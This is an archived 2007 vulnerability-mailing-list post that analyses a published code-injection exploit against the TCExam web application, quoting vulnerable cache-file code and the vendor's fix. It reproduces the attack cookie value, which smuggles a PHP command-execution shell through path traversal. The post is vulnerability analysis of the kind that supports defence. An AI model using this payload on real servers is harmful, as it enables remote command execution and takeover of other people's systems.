[VIM] TCExam code injection: why does this work? (and vendor ACK)
Steven M. Christey
coley at mitre.org
Tue May 1 23:25:41 UTC 2007
Researcher: rgod
Ref: http://www.milw0rm.com/exploits/3816
This is a pretty complex manipulation. It concentrates on a
SessionUserLang cookie and provides an attack:
SessionUserLang=%2F..%2F%0Asystem%28%24_GET%5BCMD%5D%29%3B%3F%3E%23%2F..%2Fsuntzu;
which decodes to:
/../
system($_GET[CMD]);?>#/../suntzu;
This value is fed into $language in the constructor for the
TMXResourceBundle class (see $lang_resources assignment in rgod's
extract).
$cachefile is set as:
K_PATH_CACHE.basename(K_PATH_TMX_FILE, ".xml")."_".K_USER_LANG.".php")
and, since K_USER_LANG came from SessionUserLang, this would be set to
something like:
[K_PATH_CACHE][some-basename]_/../
system($_GET[CMD]);?>#/../suntzu;.php
If $cachefile is this value, then how does it possibly make it through
this code?
$this->cachefile = $cachefile;
if (file_exists($this->cachefile)) { // read data from cache
require_once($this->cachefile);
$this->resource = $tmx;
} else {
if (!empty($this->cachefile)) {
// open cache file
file_put_contents($this->cachefile, "<"."?php\n".
"// CACHE FILE FOR LANGUAGE: ".$language."\n".
"// DATE: ".date("Y-m-d H:i:s")."\n"
How could file_put_contents() possibly succeed with such a badly
formed filename?
Well - whatever it was, the vendor apparently fixed it:
http://sourceforge.net/forum/forum.php?forum_id=690912
"TCExam 4.1.000 new release with security fixes."
The tce_tmx code is now changed to say:
"// CACHE FILE FOR LANGUAGE: ".substr($language,0,2)."\n".
but I'm still confused about how $this->cachefile is opened in the
first place. What did I miss?
- Steve
More information about the VIM
mailing list